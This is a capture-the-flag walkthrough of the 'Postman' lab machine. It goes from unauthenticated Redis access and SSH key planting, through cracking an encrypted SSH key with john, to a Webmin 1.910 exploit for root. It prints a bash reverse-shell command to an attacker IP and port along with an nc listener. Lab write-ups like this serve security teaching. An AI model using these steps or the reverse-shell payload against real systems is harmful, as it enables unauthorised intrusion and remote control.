Again, we start with nmap -sC -sV -Pn -p- -oA ./Postman 10.10.10.160
We start with SSH, HTTP, Redis, and MiniServ
By now, you all know my aversion to Metasploit, but now that I know what to look for, I'm sure I can find a method of exploit outside of MSF. We come across CVE-2018-12326. So, to start, let's go ahead and install redis on our kali box so we can have the redis-tools for later. To do that, we run
sudo apt-get install redis
From there, we should be able to use redis-cli to connect to the box with redis-cli -h 10.10.10.160. Once connected, we can try a CONFIG GET * just to see if we can actually execute anything unauthenticated. Not surprisingly, we can.
There's 178 or so entries in that command, but we only really needed to know that we could execute. Running CONFIG GET DIR shows us that we are operating in the /var/lib/redis directory. Avinash had a pre-built exploit written here, but let's examine what it is actually doing (or it's no better that using MSF).
OK. It looks like this script is creating SSH keys and transferring them via redis-cli to the target. We could do that manually, but as I've said, hackers are lazy creatures. I'll re-use code/script as long as I understand what it is doing. That said, that script looks like it needs a valid username on the box, which we don't have. However, checking keys * in redis-cli and using GET cracklist, I can see the key that was created. Perhaps I can force the connection via key.
Now before I go celebrating, this shell/user cannot do ANYTHING hardly. Round 2. Jump to /tmp grab LinEnum.sh and run it thoroughly to see what jumps out. And it does! /opt/id_rsa.bak owned by "Matt". Let's see if we can view it.
So, it's encrypted. Simple SSH2JOHN command.
sudo /usr/share/john/ssh2john.py key.enc > clearkey.enc
sudo john --wordlist=/usr/share/wordlists/rockyou.txt clearkey.enc
It looks like Matt has a password of computer2008. Move from redis to Matt and grab the user flag. There's not a lot more we can do in CLI right now, so let's jump over to port 10000 and it's MiniServ WebMin page. Logging in with Matt:computer2008, we can grab the Webmin version (1.910) and see what's there. I eventually come across this Proof of Concept on GitHub and try it out, crafting my payload using:
echo -n 'bash -c "bash -i >& /dev/tcp/10.10.14.10/9999 0>&1"' | base64
nc -lvnp 9999
Let's send it off and see if it works. I did have to change the + signs to %2b's, but after that Boom! We have a winner and a root shell.